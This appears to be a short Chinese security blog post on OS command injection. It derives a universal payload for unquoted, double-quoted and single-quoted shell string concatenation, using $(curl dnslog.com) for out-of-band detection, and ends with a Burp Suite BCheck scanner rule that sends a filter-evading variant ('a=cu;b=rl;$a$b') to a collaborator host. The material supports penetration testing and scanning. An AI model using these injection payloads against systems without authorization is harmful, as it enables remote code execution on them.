本文最后更新于7 天前,其中的信息可能已经过时,如有错误请发送邮件到3449421627@qq.com
序言
总结命令注入的所有可能性的情况并且得出最通用的payload
文章中所有可控的地方为test
直接拼接
curl test.abc.com
payload
curl test.$(curl dnslog.com).com
双引号拼接
curl test.abc.com
payload
curl "test.$(curl dnslog.com).com"
单引号拼接
curl test.abc.com
payload
curl 'test.'$(curl dnslog.com)'.com'
总结
单双引号
curl 'test.'"$(curl dnslog.com).com"''
输入payload
'"$(curl dnslog.com).com"'
直接拼接这个payload不行
所以最终payload
$(curl dnslog.com)'$(curl dnslog.com)'
BChecks
metadata:
language: v1-beta
name: "rce"
description: "rce"
author: "chain00x"
given insertion point then
send payload:
appending: `$(a=cu;b=rl;$a$b {generate_collaborator_address()})'$(a=cu;b=rl;$a$b {generate_collaborator_address()})'`
if any interactions then
report issue:
severity: high
confidence: firm
detail: "rce"
remediation: "rce"
end if
